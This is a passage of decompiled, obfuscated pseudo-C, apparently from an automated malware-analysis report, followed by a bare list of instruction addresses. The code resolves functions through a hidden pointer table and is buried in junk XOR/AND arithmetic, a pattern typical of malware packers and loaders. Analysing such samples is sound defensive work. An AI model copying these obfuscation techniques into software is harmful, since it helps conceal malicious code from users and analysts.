								_t559 = _t557;
								 *_t744 =  *_t744 ^ _t697;
								 *_t744 =  *_t744 ^ _t559 + 0x0041d099;
								_t472 =  *((intOrPtr*)(_t559 + 0x41f060))(_t726);
								 *_t744 = _t596;
								 *(_t559 + 0x41c24c) = 0 ^ _t472;
								_t599 = 0;
								 *_t289 = _t697;
								 *_t744 =  *_t744 & 0x00000000;
								 *_t744 =  *_t744 + _t559 + 0x41cdd2;
								 *_t744 =  *_t744 & 0x00000000;
								 *_t744 =  *_t744 | _t559 + 0x0041c846;
								_t475 =  *((intOrPtr*)(_t559 + 0x41f068))(_t726, _t670);
								 *(_t726 - 0x10) = _t641;
								 *(_t559 + 0x41c9fe) = 0 ^ _t475;
								_t644 =  *(_t726 - 0x10);
								 *(_t726 - 0xc) =  *(_t726 - 0xc) & 0x0000ffff;
								 *_t744 =  *_t744 ^ _t644;
								 *_t744 =  *_t744 | _t559 + 0x0041c9e4;
								 *_t744 =  *_t744 & 0x00000000;
								 *_t744 =  *_t744 ^ _t559 + 0x0041c746;
								_t478 =  *((intOrPtr*)(_t559 + 0x41f068))(_t644, _t644);
								 *(_t726 - 0x14) = _t644;
								 *(_t559 + 0x41c559) =  *(_t559 + 0x41c559) & 0x00000000;
								 *(_t559 + 0x41c559) =  *(_t559 + 0x41c559) ^ (_t644 ^  *(_t726 - 0x14) | _t478);
								_t647 =  *(_t726 - 0x14);
							} else {
								_t192 = _t557 + 0x41c8e1; // 0x41c8e1
								 *_t744 =  *_t744 - _t641;
								 *_t744 =  *_t744 | _t192;
								_t512 =  *((intOrPtr*)(_t557 + 0x41f060))(_t641);
								 *(_t726 - 0x10) = 0;
								 *_t744 =  *_t744 | _t512;
								_t196 = _t557 + 0x41c6e2; // 0x41c6e2
								 *_t744 =  *_t744 - _t557;
								 *_t744 =  *_t744 | _t196;
								_t514 =  *((intOrPtr*)(_t557 + 0x41f060))(_t557,  *(_t726 - 0x10));
								_t610 = (_t596 & 0x00000000) +  *_t744;
								_t747 = _t744 - 0xfffffffc;
								 *_t747 =  *_t747 + _t670;
								_t676 = _t514;
								_t515 = _t676 + _t610;
								_t678 = 0;
								 *(_t726 - 0x10) = _t641;
								_t612 = _t610 & 0x00000000 ^ _t641 ^  *(_t726 - 0x10) ^  *(_t557 + 0x41c521);
								_t654 =  *(_t726 - 0x10);
								if(_t612 > _t515) {
									_t202 = _t557 + 0x41c8e1; // 0x41c8e1
									 *_t747 =  *_t747 & 0x00000000;
									 *_t747 =  *_t747 | _t202;
									_t203 = _t557 + 0x41c6e2; // 0x41c6e2
									 *_t747 = _t203;
									_t515 =  *((intOrPtr*)(_t557 + 0x41f064))( *(_t726 - 0x10), _t697);
								}
								 *(_t557 + 0x41c56c) =  *(_t557 + 0x41c56c) & 0x00000000;
								 *(_t557 + 0x41c56c) =  *(_t557 + 0x41c56c) ^ (_t726 & 0x00000000 | _t515);
								_t726 = _t726;
								 *_t747 =  *_t747 & 0x00000000;
								 *_t747 =  *_t747 + _t697;
								_t210 = _t557 + 0x41c266; // 0x41c266
								 *_t747 = _t210;
								_push( *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x10), _t515));
								_pop( *_t213);
								_push( *(_t726 - 0x10));
								_pop( *_t215);
								_t714 =  *_t697;
								_t216 = _t557 + 0x41ce1f; // 0x41ce1f
								 *_t747 =  *_t747 & 0x00000000;
								 *_t747 =  *_t747 ^ _t216;
								_t519 =  *((intOrPtr*)(_t557 + 0x41f060))(_t714);
								 *(_t726 - 0x10) = 0;
								 *_t747 =  *_t747 ^ _t519;
								_t220 = _t557 + 0x41c0ad; // 0x41c0ad
								 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
								 *_t747 =  *_t747 | _t220;
								_t521 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x14),  *(_t726 - 0x10));
								_pop( *_t225);
								_t614 = _t612 & 0x00000000 |  *(_t726 - 0x14);
								 *_t227 = _t521;
								 *(_t726 - 0x10) =  *(_t726 - 0x10) + _t614;
								_push( *(_t726 - 0x10));
								_pop(_t522);
								_t656 = _t654;
								 *(_t726 - 0x10) = _t714;
								_t616 = _t614 & 0x00000000 | _t714 & 0x00000000 ^  *(_t557 + 0x41c765);
								_t717 =  *(_t726 - 0x10);
								if(_t616 > _t522) {
									_t234 = _t557 + 0x41ce1f; // 0x41ce1f
									 *_t747 = _t234;
									_t236 = _t557 + 0x41c0ad; // 0x41c0ad
									 *_t747 =  *_t747 & 0x00000000;
									 *_t747 =  *_t747 | _t236;
									_t522 =  *((intOrPtr*)(_t557 + 0x41f064))(_t726,  *(_t726 - 0x14));
								}
								 *_t747 = _t656;
								 *(_t557 + 0x41c497) = 0 ^ _t522;
								_t659 = 0;
								 *_t747 = _t678;
								_t679 = _t717;
								_t718 = _t679 +  *(_t726 + 8);
								_t681 = 0;
								_t240 = _t557 + 0x41d159; // 0x41d159
								 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
								 *_t747 =  *_t747 ^ _t240;
								_t244 = _t557 + 0x41d213; // 0x41d213
								 *(_t726 - 0x10) = 0;
								 *_t747 =  *_t747 + _t244;
								_t525 =  *((intOrPtr*)(_t557 + 0x41f068))( *(_t726 - 0x10),  *(_t726 - 0x14));
								 *(_t726 - 0x14) = _t718;
								 *(_t557 + 0x41d182) =  *(_t557 + 0x41d182) & 0x00000000;
								 *(_t557 + 0x41d182) =  *(_t557 + 0x41d182) ^ (_t718 ^  *(_t726 - 0x14) | _t525);
								_t599 = _t616;
								_t255 = _t557 + 0x41c85c; // 0x41c85c
								 *_t747 =  *_t747 & 0x00000000;
								 *_t747 =  *_t747 | _t255;
								_t256 = _t557 + 0x41c10e; // 0x41c10e
								 *_t747 = _t256;
								_t528 =  *((intOrPtr*)(_t557 + 0x41f068))( *(_t726 - 0x14), _t659);
								 *(_t557 + 0x41ce00) =  *(_t557 + 0x41ce00) & 0x00000000;
								 *(_t557 + 0x41ce00) =  *(_t557 + 0x41ce00) | _t659 & 0x00000000 | _t528;
								_t662 = _t659;
								_push( *(_t726 - 0x14) + 2);
								_pop( *_t263);
								_push( *(_t726 - 0x14));
								_pop( *_t265);
								_t266 = _t557 + 0x41c9a3; // 0x41c9a3
								 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
								 *_t747 =  *_t747 ^ _t266;
								_t270 = _t557 + 0x41d1fa; // 0x41d1fa
								 *_t747 = _t270;
								_t531 =  *((intOrPtr*)(_t557 + 0x41f068))( *(_t726 - 0x14),  *(_t726 - 0x14));
								 *_t747 = _t662;
								 *((intOrPtr*)(_t557 + 0x41d0fe)) = _t531;
								_t647 = 0;
								_t697 = 0 ^  *_t747;
								_t744 =  &(_t747[1]);
								_t274 = _t557 + 0x41d0af; // 0x41d0af
								 *_t744 =  *_t744 & 0x00000000;
								 *_t744 =  *_t744 | _t274;
								_t275 = _t557 + 0x41ceae; // 0x41ceae
								 *_t744 = _t275;
								_t478 =  *((intOrPtr*)(_t557 + 0x41f068))( *(_t726 - 0x10), _t599);
								 *(_t726 - 0x10) = _t681;
								 *(_t557 + 0x41c8cd) =  *(_t557 + 0x41c8cd) & 0x00000000;
								 *(_t557 + 0x41c8cd) =  *(_t557 + 0x41c8cd) ^ _t681 -  *(_t726 - 0x10) ^ _t478;
								_t670 =  *(_t726 - 0x10);
							}
							 *(_t726 - 0x10) = _t559;
							_t562 =  *(_t726 - 0x10);
							_t312 = _t562 + 0x41cb0b; // 0x41cb0b
							 *(_t726 - 0x14) = 0;
							 *_t744 =  *_t744 | _t312;
							_t482 =  *((intOrPtr*)(_t562 + 0x41f060))( *(_t726 - 0x14));
							 *_t744 = _t482;
							_t317 = _t562 + 0x41cda5; // 0x41cda5
							 *_t744 = _t317;
							_t484 =  *((intOrPtr*)(_t562 + 0x41f060))( *(_t726 - 0x14),  *(_t726 - 0x10));
							_t745 = _t744 - 0xfffffffc;
							 *_t745 =  *_t745 ^ _t726;
							_t727 = _t484;
							_t485 = _t727 +  *_t744;
							_t729 = 0;
							 *(_t729 - 0x14) = _t697;
							_t602 =  *(_t562 + 0x41c96a);
							_t700 =  *(_t729 - 0x14);
							if(_t602 > _t485) {
								_t323 = _t562 + 0x41cb0b; // 0x41cb0b
								 *_t745 =  *_t745 & 0x00000000;
								 *_t745 =  *_t745 | _t323;
								_t324 = _t562 + 0x41cda5; // 0x41cda5
								 *(_t729 - 0x14) =  *(_t729 - 0x14) & 0x00000000;
								 *_t745 =  *_t745 | _t324;
								_t485 =  *((intOrPtr*)(_t562 + 0x41f064))( *(_t729 - 0x14), _t729);
							}
							 *_t329 = _t485;
							 *_t331 =  *(_t729 - 0x10);
							_t745[1] =  *(_t729 - 0xc);
							_t564 = _t562;
							_t334 = _t564 + 0x41cee2; // 0x41cee2
							 *_t745 = _t334;
							_t336 = _t564 + 0x41d33a; // 0x41d33a
							 *(_t729 - 0x14) = 0;
							 *_t745 =  *_t745 | _t336;
							_t488 =  *((intOrPtr*)(_t564 + 0x41f068))( *(_t729 - 0x14),  *(_t729 - 0x10), _t602);
							 *(_t564 + 0x41d1da) =  *(_t564 + 0x41d1da) & 0x00000000;
							 *(_t564 + 0x41d1da) =  *(_t564 + 0x41d1da) | _t700 -  *_t745 | _t488;
							_t703 = _t700;
							 *(_t729 - 0x10) = _t670;
							_t673 =  *(_t729 - 0x10);
							 *_t745 =  *_t745 - _t647;
							 *_t745 =  *_t745 ^ (_t488 & 0x00000000 | _t670 ^  *(_t729 - 0x10) |  *(_t729 - 4));
							_t348 = _t564 + 0x41d2b3; // 0x41d2b3
							 *_t745 =  *_t745 - _t647;
							 *_t745 = _t348;
							_t349 = _t564 + 0x41cb87; // 0x41cb87
							 *(_t729 - 0x10) =  *(_t729 - 0x10) & 0x00000000;
							 *_t745 =  *_t745 + _t349;
							_t493 =  *((intOrPtr*)(_t564 + 0x41f068))( *(_t729 - 0x10), _t647, _t647);
							 *(_t729 - 0x10) = _t602;
							 *(_t564 + 0x41cf9a) =  *(_t564 + 0x41cf9a) & 0x00000000;
							 *(_t564 + 0x41cf9a) =  *(_t564 + 0x41cf9a) | _t602 ^  *(_t729 - 0x10) | _t493;
							_t605 =  *(_t729 - 0x10);
							_t746 =  &(_t745[1]);
							 *(_t729 - 0x10) = 0;
							 *_t746 =  *_t746 ^  *_t745;
							_t363 = _t564 + 0x41c922; // 0x41c922
							 *(_t729 - 0x10) = 0;
							 *_t746 =  *_t746 | _t363;
							_t366 = _t564 + 0x41c97d; // 0x41c97d
							 *_t746 =  *_t746 & 0x00000000;
							 *_t746 =  *_t746 + _t366;
							_t498 =  *((intOrPtr*)(_t564 + 0x41f068))(_t605,  *(_t729 - 0x10),  *(_t729 - 0x10));
							 *(_t564 + 0x41cae1) =  *(_t564 + 0x41cae1) & 0x00000000;
							 *(_t564 + 0x41cae1) =  *(_t564 + 0x41cae1) | _t729 & 0x00000000 | _t498;
							_t726 = _t729;
							_t499 =  *((intOrPtr*)(_t564 + 0x41f050))();
							 *(_t726 - 0x14) = 0;
							 *_t746 =  *_t746 + _t499;
							_t375 = _t564 + 0x41c197; // 0x41c197
							 *(_t726 - 0x14) = 0;
							 *_t746 =  *_t746 | _t375;
							_t501 =  *((intOrPtr*)(_t564 + 0x41f060))( *(_t726 - 0x14),  *(_t726 - 0x14));
							 *(_t726 - 0x14) = 0;
							 *_t746 =  *_t746 | _t501;
							_t381 = _t564 + 0x41c46f; // 0x41c46f
							 *(_t726 - 0x14) = 0;
							 *_t746 =  *_t746 ^ _t381;
							_t503 =  *((intOrPtr*)(_t564 + 0x41f060))( *(_t726 - 0x14),  *(_t726 - 0x14));
							_pop( *_t385);
							_t607 = (_t605 & 0x00000000) +  *(_t726 - 0x10);
							 *_t387 = _t503;
							 *(_t726 - 0x14) =  *(_t726 - 0x14) + _t607;
							_push( *(_t726 - 0x14));
							_pop(_t504);
							_t566 = _t564;
							 *(_t726 - 0x10) = _t673;
							_t596 = _t607 & 0x00000000 ^ _t673 -  *(_t726 - 0x10) ^  *(_t566 + 0x41c9d0);
							_t670 =  *(_t726 - 0x10);
							if(_t596 > _t504) {
								_t395 = _t566 + 0x41c197; // 0x41c197
								 *_t746 =  *_t746 & 0x00000000;
								 *_t746 =  *_t746 + _t395;
								_t396 = _t566 + 0x41c46f; // 0x41c46f
								 *(_t726 - 0x10) = 0;
								 *_t746 =  *_t746 ^ _t396;
								_t504 =  *((intOrPtr*)(_t566 + 0x41f064))( *(_t726 - 0x10), _t703);
								 *(_t566 + 0x41cfe1) =  *(_t566 + 0x41cfe1) & 0x00000000;
								 *(_t566 + 0x41cfe1) =  *(_t566 + 0x41cfe1) | _t726 ^  *_t746 ^ _t504;
								_t726 = _t726;
							}
							_t744 =  &(_t746[1]);
							 *_t744 =  *_t744 ^ _t726;
							 *_t744 = _t703;
							 *_t744 = _t504 & 0x00000000 |  *_t746;
							_t509 = 0;
							 *_t744 = _t647;
							 *((intOrPtr*)( *((intOrPtr*)(_t726 - 8)))) = _t509;
							_t650 = 0;
							 *_t405 = _t726;
							 *_t744 = 4;
							_t510 = _t566;
							 *_t407 = 0 ^  *(_t726 - 0x14);
							 *(_t726 - 0x14) =  *(_t726 - 0x14) + _t510;
							_push( *(_t726 - 0x14));
							_pop(_t697);
							_t641 = _t650;
							 *_t412 =  *((intOrPtr*)(_t726 - 8));
							 *(_t726 - 0x10) =  *(_t726 - 0x10) + _t510;
							_push( *(_t726 - 0x10));
							_pop( *_t416);
							_t557 = _t566;
						} while ( *_t697 != 0);
						_t665 = _t670 + 0x14;
						_t686 = _t697;
						if( *_t665 != 0 ||  *(_t665 + 0x10) != 0) {
							if( *_t665 != 0) {
								goto L5;
							} else {
								_t10 = _t557 + 0x41d076; // 0x41d076
								 *(_t726 - 0x10) = 0;
								 *_t744 =  *_t744 | _t10;
								_t539 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x10));
								 *(_t726 - 0x14) = _t686;
								 *(_t557 + 0x41d0ee) = 0 ^ _t539;
								_push( *(_t665 + 0x10));
								_pop( *_t18);
								_push( *(_t726 - 0x10));
								_pop(_t687);
								_t20 = _t557 + 0x41c2b0; // 0x41c2b0
								 *_t744 = _t20;
								_t541 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x10));
								 *(_t557 + 0x41c1b3) =  *(_t557 + 0x41c1b3) & 0x00000000;
								 *(_t557 + 0x41c1b3) =  *(_t557 + 0x41c1b3) | _t726 ^  *_t744 | _t541;
								_t726 = _t726;
							}
							_t626 =  *_t740;
							 *_t740 =  *(_t665 + 0x10);
							_t47 = _t551 + 0x41c661; // 0x41c661
							 *_t740 =  *_t740 ^ _t726;
							 *_t740 =  *_t740 + _t47;
							_t430 =  *((intOrPtr*)(_t551 + 0x41f060))(_t622);
							 *_t740 = _t687;
							 *((intOrPtr*)(_t551 + 0x41d31e)) = _t430;
							_t690 = 0;
							 *_t50 = _t726;
							_t51 = _t551 + 0x41c5b3; // 0x41c5b3
							 *_t740 = _t51;
							_t432 =  *((intOrPtr*)(_t551 + 0x41f060))( *(_t726 - 0x10));
							 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
							 *_t740 =  *_t740 ^ _t432;
							_t57 = _t551 + 0x41c868; // 0x41c868
							 *_t740 =  *_t740 & 0x00000000;
							 *_t740 =  *_t740 ^ _t57;
							_t434 =  *((intOrPtr*)(_t551 + 0x41f060))( *(_t726 - 0x14));
							 *_t59 = _t665;
							_t573 = 0 ^  *(_t726 - 0x10);
							 *_t61 = _t434;
							 *(_t726 - 0x14) =  *(_t726 - 0x14) + _t573;
							_push( *(_t726 - 0x14));
							_pop(_t435);
							_t667 = _t665;
							 *(_t726 - 0x14) = _t435;
							_t575 = _t573 & 0x00000000 ^ _t435 & 0x00000000 ^  *(_t551 + 0x41c633);
							_t438 =  *(_t726 - 0x14);
							if(_t575 > _t438) {
								_t68 = _t551 + 0x41c5b3; // 0x41c5b3
								 *_t740 = _t68;
								_t70 = _t551 + 0x41c868; // 0x41c868
								 *(_t726 - 0x10) =  *(_t726 - 0x10) & 0x00000000;
								 *_t740 =  *_t740 | _t70;
								_t438 =  *((intOrPtr*)(_t551 + 0x41f064))( *(_t726 - 0x10),  *(_t726 - 0x14));
							}
							 *(_t726 - 0x10) = _t626;
							 *(_t551 + 0x41c2a0) =  *(_t551 + 0x41c2a0) & 0x00000000;
							 *(_t551 + 0x41c2a0) =  *(_t551 + 0x41c2a0) | _t626 & 0x00000000 ^ _t438;
							_t629 =  *(_t726 - 0x10);
							 *(_t726 - 0x10) = _t551;
							_t554 =  *(_t726 - 0x10);
							 *_t740 =  *_t740 & 0x00000000;
							 *_t740 =  *_t740 | _t438 & 0x00000000 | _t551 & 0x00000000 ^  *(_t726 + 8);
							_t84 = _t554 + 0x41c812; // 0x41c812
							 *_t740 =  *_t740 & 0x00000000;
							 *_t740 =  *_t740 + _t84;
							_t85 = _t554 + 0x41ca65; // 0x41ca65
							 *_t740 =  *_t740 & 0x00000000;
							 *_t740 =  *_t740 | _t85;
							_t443 =  *((intOrPtr*)(_t554 + 0x41f068))(_t575, _t690);
							 *(_t726 - 0x14) = _t667;
							 *(_t554 + 0x41d25f) =  *(_t554 + 0x41d25f) & 0x00000000;
							 *(_t554 + 0x41d25f) =  *(_t554 + 0x41d25f) ^ (_t667 -  *(_t726 - 0x14) | _t443);
							_t670 =  *(_t726 - 0x14);
							 *_t94 = _t575;
							 *_t740 =  *_t740 ^ _t690;
							_push( *((intOrPtr*)(_t726 - 8)));
							_pop(_t691);
							 *((intOrPtr*)(_t726 - 8)) = _t691 +  *(_t726 - 0x10);
							_t693 = 0;
							_t98 = _t554 + 0x41d15d; // 0x41d15d
							 *_t740 =  *_t740 - _t575;
							 *_t740 = _t98;
							_t99 = _t554 + 0x41c260; // 0x41c260
							 *(_t726 - 0x10) = 0;
							 *_t740 =  *_t740 | _t99;
							_push( *((intOrPtr*)(_t554 + 0x41f068))( *(_t726 - 0x10), _t575));
							_pop( *_t103);
							_push( *(_t726 - 0x10));
							_pop( *_t105);
							_push( *((intOrPtr*)(_t670 + 0xc)));
							_pop( *_t107);
							_push( *(_t726 - 0x14));
							_pop(_t576);
							 *_t740 =  *_t740 & 0x00000000;
							 *_t740 =  *_t740 + _t576;
							_t109 = _t554 + 0x41ca52; // 0x41ca52
							 *_t740 =  *_t740 - _t554;
							 *_t740 =  *_t740 + _t109;
							_t449 =  *((intOrPtr*)(_t554 + 0x41f060))(_t554, _t554);
							 *(_t726 - 0x14) = _t629;
							 *(_t554 + 0x41cd09) =  *(_t554 + 0x41cd09) & 0x00000000;
							 *(_t554 + 0x41cd09) =  *(_t554 + 0x41cd09) | _t629 -  *(_t726 - 0x14) ^ _t449;
							_t632 =  *(_t726 - 0x14);
							_t741 = _t740 - 0xfffffffc;
							_push(0);
							 *_t741 =  *_t741 | _t449;
							_push( *_t740);
							_pop(_t450);
							 *_t741 = _t450 +  *(_t726 + 8);
							_t120 = _t554 + 0x41c07f; // 0x41c07f
							 *_t741 = _t120;
							_t454 =  *((intOrPtr*)(_t554 + 0x41f060))( *(_t726 - 0x10),  *(_t726 - 0x14));
							 *_t741 =  *_t741 - _t632;
							 *_t741 =  *_t741 | _t454;
							_t123 = _t554 + 0x41d248; // 0x41d248
							 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
							 *_t741 =  *_t741 | _t123;
							_t456 =  *((intOrPtr*)(_t554 + 0x41f060))( *(_t726 - 0x14), _t632);
							_t581 =  *_t741;
							_t742 =  &(_t741[1]);
							 *(_t726 - 0x10) = _t554;
							_push(_t581 + _t456);
							_t557 =  *(_t726 - 0x10);
							_pop(_t457);
							_t583 = _t581 & 0x00000000 ^ _t632 -  *_t742 ^  *(_t557 + 0x41d0e6);
							_t635 = _t632;
							if(_t583 > _t457) {
								_t131 = _t557 + 0x41c07f; // 0x41c07f
								 *(_t726 - 0x14) =  *(_t726 - 0x14) & 0x00000000;
								 *_t742 =  *_t742 + _t131;
								_t135 = _t557 + 0x41d248; // 0x41d248
								 *(_t726 - 0x14) = 0;
								 *_t742 =  *_t742 | _t135;
								_t457 =  *((intOrPtr*)(_t557 + 0x41f064))( *(_t726 - 0x14),  *(_t726 - 0x14));
								 *(_t726 - 0x10) = _t693;
								 *((intOrPtr*)(_t557 + 0x41cd68)) = _t457;
								_t693 =  *(_t726 - 0x10);
							}
							_pop( *_t142);
							 *_t742 = _t583 & 0x00000000 ^  *(_t726 - 0x10);
							_t586 = _t693;
							_t694 = _t586 +  *(_t726 + 8);
							_t588 = 0;
							 *_t742 =  *_t742 & 0x00000000;
							 *_t742 =  *_t742 | _t588;
							_t145 = _t557 + 0x41d135; // 0x41d135
							 *_t742 = _t145;
							_t147 = _t557 + 0x41c60e; // 0x41c60e
							 *_t742 =  *_t742 & 0x00000000;
							 *_t742 =  *_t742 | _t147;
							_t460 =  *((intOrPtr*)(_t557 + 0x41f068))(_t588,  *(_t726 - 0x10), _t457);
							 *(_t726 - 0x14) = _t635;
							 *((intOrPtr*)(_t557 + 0x41c3e6)) = _t460;
							_t638 =  *(_t726 - 0x14);
							_t590 =  *_t742;
							_t743 = _t742 - 0xfffffffc;
							 *_t743 =  *_t743 - _t638;
							 *_t743 =  *_t743 ^ _t590;
							_t152 = _t557 + 0x41c220; // 0x41c220
							 *(_t726 - 0x14) = 0;
							 *_t743 =  *_t743 + _t152;
							_t462 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x14), _t638);
							 *(_t726 - 0x10) = _t590;
							 *(_t557 + 0x41cf1d) =  *(_t557 + 0x41cf1d) & 0x00000000;
							 *(_t557 + 0x41cf1d) =  *(_t557 + 0x41cf1d) ^ (_t590 ^  *(_t726 - 0x10) | _t462);
							_t463 =  *((intOrPtr*)(_t557 + 0x41f054))();
							 *(_t726 - 0x14) = 0;
							 *_t743 =  *_t743 + _t463;
							_t166 = _t557 + 0x41c49b; // 0x41c49b
							 *(_t726 - 0x10) = 0;
							 *_t743 =  *_t743 + _t166;
							_t465 =  *((intOrPtr*)(_t557 + 0x41f060))( *(_t726 - 0x10),  *(_t726 - 0x14));
							 *(_t726 - 0x14) = _t694;
							 *(_t557 + 0x41c8aa) =  *(_t557 + 0x41c8aa) & 0x00000000;
							 *(_t557 + 0x41c8aa) =  *(_t557 + 0x41c8aa) | _t694 & 0x00000000 ^ _t465;
							_t697 =  *(_t726 - 0x14);
							_t744 = _t743 - 0xfffffffc;
							 *(_t726 - 0x10) = _t638;
							 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
							 *(_t726 - 4) =  *(_t726 - 4) ^ _t638 -  *(_t726 - 0x10) ^ _t465 & 0x00000000 ^  *_t743;
							_t641 =  *(_t726 - 0x10);
							_t183 = _t557 + 0x41c279; // 0x41c279
							 *_t744 = _t183;
							_t185 = _t557 + 0x41d1ea; // 0x41d1ea
							 *_t744 =  *_t744 - _t697;
							 *_t744 = _t185;
							_t470 =  *((intOrPtr*)(_t557 + 0x41f068))(_t697,  *(_t726 - 0x14));
							 *(_t726 - 0x14) =  *(_t726 - 0x10);
							 *(_t557 + 0x41cbc5) = 0 ^ _t470;
							_t596 =  *(_t726 - 0x14);
							goto L11;
						}
						 *_t744 =  *_t744 ^ _t510;
						_t542 = _t510;
						return _t542;
					}
				}
			}

0x02275378
0x02275378
0x02275378
0x0227537e
0x0227537f
0x02275382
0x02275385
0x0227538b
0x0227538c
0x0227538f
0x02275398
0x02275399
0x0227539d
0x022753a0
0x022753af
0x022753b2
0x022753b9
0x022753ba
0x022753bd
0x022753be
0x022753cb
0x022753d0
0x022753d9
0x022753dd
0x022753e6
0x022753ed
0x022753f0
0x022753f0
0x022753f7
0x022753fd
0x02275403
0x02275403
0x02275405
0x0227540b
0x0227540c
0x02275413
0x02275417
0x0227541a
0x02275421
0x02275424
0x02275427
0x02275433
0x0227543a
0x02275440
0x02275441
0x02275445
0x02275445
0x02275448
0x0227544f
0x02275452
0x02275455
0x0227545d
0x02275464
0x0227546a
0x0227546b
0x0227546e
0x02275477
0x0227547a
0x02275480
0x02275487
0x0227548a
0x02275491
0x02275495
0x02275498
0x022754a0
0x022754a3
0x022754aa
0x022754ad
0x022754b0
0x022754b3
0x022754b4
0x022754b5
0x022754c4
0x022754c6
0x022754cb
0x022754cd
0x022754d6
0x022754d9
0x022754df
0x022754e6
0x022754e9
0x022754e9
0x022754ef
0x022754f7
0x022754fe
0x02275504
0x02275507
0x02275515
0x02275519
0x0227551d
0x02275520
0x02275527
0x0227552b
0x0227552e
0x02275535
0x02275539
0x0227553c
0x02275542
0x0227554a
0x02275551
0x02275557
0x0227555a
0x02275562
0x02275565
0x02275568
0x0227556b
0x0227556e
0x0227556f
0x02275576
0x02275579
0x0227557c
0x02275582
0x0227558c
0x02275595
0x02275596
0x02275599
0x0227559c
0x022755a2
0x022755a5
0x022755a8
0x022755ab
0x022755ad
0x022755b1
0x022755b4
0x022755bb
0x022755be
0x022755c1
0x022755c7
0x022755cf
0x022755d6
0x022755dc
0x022755e8
0x022755eb
0x022755ed
0x022755f0
0x022755f1
0x022755fb
0x022755fe
0x02275607
0x0227560a
0x02275611
0x02275614
0x02275617
0x0227561d
0x02275624
0x02275627
0x0227562f
0x02275632
0x02275635
0x0227563c
0x0227563d
0x02275640
0x0227564e
0x02275650
0x02275653
0x02275655
0x0227565b
0x02275662
0x02275665
0x0227566b
0x02275675
0x02275678
0x0227567e
0x02275685
0x0227568b
0x0227568b
0x02275694
0x0227569c
0x022756a0
0x022756a4
0x022756a6
0x022756a8
0x022756ac
0x022756af
0x022756b8
0x022756bb
0x022756c2
0x022756c6
0x022756c9
0x022756cf
0x022756d6
0x022756dc
0x022756e1
0x022756e4
0x022756e8
0x022756eb
0x022756ee
0x022756f4
0x022756fe
0x02275701
0x02275707
0x0227570f
0x02275716
0x0227571f
0x02275725
0x0227572f
0x02275732
0x02275738
0x02275742
0x02275745
0x0227574b
0x02275753
0x0227575a
0x02275760
0x0227576c
0x0227576f
0x02275777
0x0227577b
0x0227577e
0x02275781
0x0227578a
0x0227578d
0x02275794
0x02275797
0x0227579a
0x022757a0
0x022757a7
0x022757ad
0x022757b0
0x022757b0
0x022757b6
0x02275a4d
0x02275a51
0x02275a59
0x02275a5c
0x02275a5f
0x02275a67
0x02275a6e
0x02275a74
0x02275a75
0x02275a7f
0x02275a83
0x02275a8d
0x02275a91
0x02275a94
0x02275a9a
0x02275aa1
0x02275aa7
0x02275aaa
0x02275ab8
0x02275abb
0x02275ac5
0x02275ac9
0x02275acc
0x02275ad2
0x02275ada
0x02275ae1
0x02275ae7
0x022757bc
0x022757bc
0x022757c3
0x022757c6
0x022757c9
0x022757cf
0x022757d9
0x022757dc
0x022757e3
0x022757e6
0x022757e9
0x022757f5
0x022757f8
0x022757fd
0x02275801
0x02275804
0x02275806
0x02275807
0x02275816
0x02275818
0x0227581d
0x0227581f
0x02275826
0x0227582a
0x0227582d
0x02275836
0x02275839
0x02275839
0x02275845
0x0227584c
0x02275852
0x02275854
0x02275858
0x0227585b
0x02275864
0x0227586d
0x0227586e
0x02275871
0x02275874
0x0227587a
0x0227587c
0x02275883
0x02275887
0x0227588a
0x02275890
0x0227589a
0x0227589d
0x022758a3
0x022758aa
0x022758ad
0x022758b9
0x022758bc
0x022758c3
0x022758c6
0x022758c9
0x022758cc
0x022758cd
0x022758ce
0x022758dd
0x022758df
0x022758e4
0x022758e6
0x022758ef
0x022758f2
0x022758f9
0x022758fd
0x02275900
0x02275900
0x02275908
0x0227590f
0x02275915
0x02275918
0x0227591c
0x02275920
0x02275922
0x02275923
0x02275929
0x02275930
0x02275933
0x02275939
0x02275943
0x02275946
0x0227594c
0x02275954
0x0227595b
0x0227596f
0x02275970
0x02275977
0x0227597b
0x0227597e
0x02275987
0x0227598a
0x02275996
0x0227599d
0x022759a3
0x022759a4
0x022759a5
0x022759a8
0x022759ab
0x022759ae
0x022759b4
0x022759bb
0x022759be
0x022759c7
0x022759ca
0x022759d2
0x022759d9
0x022759df
0x022759e2
0x022759e5
0x022759e8
0x022759ef
0x022759f3
0x022759f6
0x022759ff
0x02275a02
0x02275a08
0x02275a10
0x02275a17
0x02275a1d
0x02275a1d
0x02275aea
0x02275af8
0x02275afb
0x02275b01
0x02275b0b
0x02275b0e
0x02275b17
0x02275b1a
0x02275b23
0x02275b26
0x02275b35
0x02275b3a
0x02275b3e
0x02275b41
0x02275b43
0x02275b44
0x02275b4f
0x02275b51
0x02275b56
0x02275b58
0x02275b5f
0x02275b63
0x02275b66
0x02275b6c
0x02275b73
0x02275b76
0x02275b76
0x02275b7d
0x02275b83
0x02275b8e
0x02275b92
0x02275b93
0x02275b9c
0x02275b9f
0x02275ba5
0x02275baf
0x02275bb2
0x02275bbe
0x02275bc5
0x02275bcb
0x02275bcc
0x02275bda
0x02275bde
0x02275be1
0x02275be4
0x02275beb
0x02275bee
0x02275bf1
0x02275bf7
0x02275bfe
0x02275c01
0x02275c07
0x02275c0f
0x02275c16
0x02275c1c
0x02275c28
0x02275c2b
0x02275c35
0x02275c38
0x02275c3e
0x02275c48
0x02275c4b
0x02275c52
0x02275c56
0x02275c59
0x02275c65
0x02275c6c
0x02275c72
0x02275c73
0x02275c79
0x02275c83
0x02275c86
0x02275c8c
0x02275c96
0x02275c99
0x02275c9f
0x02275ca9
0x02275cac
0x02275cb2
0x02275cbc
0x02275cbf
0x02275ccb
0x02275cce
0x02275cd5
0x02275cd8
0x02275cdb
0x02275cde
0x02275cdf
0x02275ce0
0x02275cef
0x02275cf1
0x02275cf6
0x02275cf8
0x02275cff
0x02275d03
0x02275d06
0x02275d0c
0x02275d16
0x02275d19
